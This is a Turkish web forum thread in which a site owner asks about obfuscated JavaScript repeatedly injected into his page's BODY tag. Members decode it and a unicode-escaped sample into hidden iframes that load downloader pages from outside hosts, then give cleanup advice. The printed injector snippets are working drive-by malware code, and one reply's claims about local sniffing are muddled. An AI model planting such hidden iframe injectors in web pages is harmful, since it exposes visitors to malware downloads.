0
Kayıt Ol

Bu nedir ???

10

1.210

  • 23-02-2008, 18:56:17
    #1
    SEaL
    SEaL
    Üyeliği durduruldu
    onload="status=' ';zz='o';sl='/';sf='ram';us='t';pi='b';po='.';gw='fi';qu=':';yh='a';vo='n';bw='e';pj='m';iu='s';pt='tp';yw='c';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,iu,us,yh,pi,hh,zz,zz,pj,po,yw,vo,sl,gw,hh,bw,sl);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);
    Selam arkadaşlar

    Yulardaki kod nedir acaba, BODY tagıma eklenip duruyor. Daha önce de eklenmiş, sildiydim aradan biraz zaaman geçti bi kontrol yaparken bu kodları yeniden eklenmiş buldum index sayfamda.. Bu nedir acaba? Virüs mü, hack injektion mu, nedir?

    Var mı bilen?
  • 23-02-2008, 19:12:49
    #2
    CashAsiq
    CashAsiq
    Eposta Aktivasyonu Gerekmekte
    Aslında Konu Basit Evet yazdigin kod cok iyi crypto edilmisdir ve seninkini decode etmek biraz zaman alacagi icin ben decode edilmis bir kod uzerinden olayi sana acayim

    status=''; // bu değer bir yan etkisi yoktur
    zz='2'; // 1
    sl='/'; // /2
    sf='ram'; // 3
    pi='9'; // 4
    po='.'; // |
    qu=':'; // |
    yh='4'; // |
    tr='t.p'; // |
    vo='3'; // |
    bw='5'; // |
    pt='tp'; // |
    ab='src'; // |
    dg='ht'; // |
    ko='e'; // |
    wd='if'; // |
    ji='hp'; // _|_
    hh='1'; // \|/
    // V

    Ayirdigim tum değerler kodlar icerisinde faklı yerlere konulmus fakat hepsinin ifade ettigi bir değer var mesela hh='1'; vo='3';bw='5'; = 135

    Yukarida gordugun kodlari decode edince frame altinda http://194.145.235.34/t.php dosyasi cikiyor aynı olay sende de var d0stum
    anliyagin guzel isi bilen birinden sağlam downloder yemissin umarim anlamissindir.
  • 23-02-2008, 20:47:31
    #3
    SEaL
    SEaL
    Üyeliği durduruldu
    CashAsiq adlı üyeden alıntı: mesajı görüntüle
    Aslında Konu Basit Evet yazdigin kod cok iyi crypto edilmisdir ve seninkini decode etmek biraz zaman alacagi icin ben decode edilmis bir kod uzerinden olayi sana acayim
    status=''; // bu değer bir yan etkisi yoktur
    zz='2'; // 1
    sl='/'; // /2
    sf='ram'; // 3
    pi='9'; // 4
    po='.'; // |
    qu=':'; // |
    yh='4'; // |
    tr='t.p'; // |
    vo='3'; // |
    bw='5'; // |
    pt='tp'; // |
    ab='src'; // |
    dg='ht'; // |
    ko='e'; // |
    wd='if'; // |
    ji='hp'; // _|_
    hh='1'; // \|/
    // V
    Ayirdigim tum değerler kodlar icerisinde faklı yerlere konulmus fakat hepsinin ifade ettigi bir değer var mesela hh='1'; vo='3';bw='5'; = 135
    Yukarida gordugun kodlari decode edince frame altinda http://194.145.235.34/t.php dosyasi cikiyor aynı olay sende de var d0stum
    anliyagin guzel isi bilen birinden sağlam downloder yemissin umarim anlamissindir.
    Çok Teşekkür ederim aydınlattığın için. Fakat nasıl olmuş bu, daha doğrusu bunu sayfama nasıl eklemişler?

    Bunu sildim ama ilerde yeniden olmaması için ne gibi bir tedbir almam lazım?
  • 23-02-2008, 20:56:43
    #4
    SEaL
    SEaL
    Üyeliği durduruldu
    Bir de şu kodlar çıktı

    Alıntı
    <script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d \u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0075\u 0070\u0064\u0061\u0074\u0065\u0073\u0065\u0072\u00 76\u0065\u0072\u006e\u0065\u0074\u002e\u0063\u006e \u002f\u0064\u002e\u0070\u0068\u0070\u0020\u0077\u 0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u00 65\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073 \u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u 0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u00 6e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e');</script>
  • 23-02-2008, 22:12:49
    #5
    CashAsiq
    CashAsiq
    Eposta Aktivasyonu Gerekmekte
    SEaL adlı üyeden alıntı: mesajı görüntüle
    Bir de şu kodlar çıktı
    Onuda Decode Edelim

    <iframe src=http://updateservernet.cn/d.php width=1 height=1 style="display:none"></iframe>

    Bu Da Farklı Bir Yerdeki Downloaderi Frame Altinda Calistirmak icin eklenen farklı bir kod. Dostum Simdi Nasil Temizleyecegimize gelelim

    1.Pc Ni Updateleri tamamlanmis Bir Anti Virüs ile temizle. Antivirüslerin tanıyamayacagi malwarelerde mevcut bu sebeple format atmani oneririrm.

    2. Sitene Yerlesen bu kodlarin Server zafiyatindan bulasmadindan yani serverinin guvenlinden emin ol diğer sitelerde varmi. Kont Ettir.

    3- Ftp ve panel paslarini Değiş. Degisim islemini farklı bir temiz pc den yap.Eğer Değişim yaptin da yine boyle vakalar oluyorsa pcnde bişi olduna emin olursn.

    Gibi bircok sebep olabilir yakinda guzel bir dokuman yazicam bu konuda arkadaslarimiza yardimci olmak icin simdi dediklerimi yapmayi dene bir istersen
  • 23-02-2008, 23:05:01
    #6
    CashAsiq
    CashAsiq
    Eposta Aktivasyonu Gerekmekte
    Dokuman Yazicam Demistim 1 Saatte Karaladim biseyler Bu Konuda Yardima ihtiyac arkadaslar icin Guzel bir Dokuman Oldu Kardes Sende Yararlanabilirsin
    https://www.r10.net/r10-bilgi-arsivi/...diyenlere.html
  • 23-02-2008, 23:06:46
    #7
    ZeberuS
    ZeberuS
    Üyeliği durduruldu
    Bilgisayarında ; aşağıdaki dizinde klasör açıp CGİ dosyasını kayıt eder , sen her çalıştırdıgında onun haberi olur . Online olarak seni sniffing edebilir.

    file:///C:/Documents and Settings/USERNAME/Belgelerim/updateservernet/d.php.htm
    Her kod trojan değil .Lüzumsuz bişey , yani en azından sizinle uğraşmazlar
    Sizler sadece bulaştırma görevi göruyorsunuz , ulaşmak istenilen sen değilsin .

    Ayrıca ilk kodda http://194.145.235.34/t.php diye bir adres çalışmıyor
  • 23-02-2008, 23:37:27
    #8
    CashAsiq
    CashAsiq
    Eposta Aktivasyonu Gerekmekte
    ZeberuS adlı üyeden alıntı: mesajı görüntüle
    Bilgisayarında ; aşağıdaki dizinde klasör açıp CGİ dosyasını kayıt eder , sen her çalıştırdıgında onun haberi olur . Online olarak seni sniffing edebilir.
    file:///C:/Documents and Settings/USERNAME/Belgelerim/updateservernet/d.php.htm
    Her kod trojan değil .Lüzumsuz bişey , yani en azından sizinle uğraşmazlar
    Sizler sadece bulaştırma görevi göruyorsunuz , ulaşmak istenilen sen değilsin .
    Ayrıca ilk kodda http://194.145.235.34/t.php diye bir adres çalışmıyor
    Yazdıklarimi Dogru duzgun okursan eğer http://194.145.235.34/t.php Arkadasin verdigi kodun decode edilmis hali olmadi dedimi gorursun. Kendi yazdigim seninde
    slackersde sordugun soruya cevap veren Tx'in yazdigi kodun decode edilmis halidir.
  • 23-02-2008, 23:43:13
    #9
    ZeberuS
    ZeberuS
    Üyeliği durduruldu
    way canına